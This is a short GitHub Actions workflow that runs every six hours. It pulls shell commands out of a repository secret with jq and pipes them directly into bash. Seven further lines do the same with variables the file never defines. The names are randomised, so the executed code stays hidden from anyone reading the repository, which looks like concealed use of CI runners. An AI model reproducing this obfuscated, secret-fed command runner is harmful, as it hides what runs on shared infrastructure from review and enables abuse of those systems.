name: zhizuixy
on:
  workflow_dispatch:
  schedule:
    - cron: '17 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhizuixy
        env:
          dkyub791: ${{ secrets.dkyub791 }}
        run: |
          echo $dkyub791 | jq -r .wua30569 | /bin/bash
          echo $dtb9 | jq -r .hs43 | /bin/bash
          echo $gac2 | jq -r .ga0 | /bin/bash
          echo $zu7 | jq -r .icvpl358 | /bin/bash
          echo $jhdc235 | jq -r .t53898 | /bin/bash
          echo $t463 | jq -r .vmxph10221 | /bin/bash
          echo $z5596 | jq -r .rem13 | /bin/bash
          echo $gxigk55 | jq -r .wqtcr7804 | /bin/bash

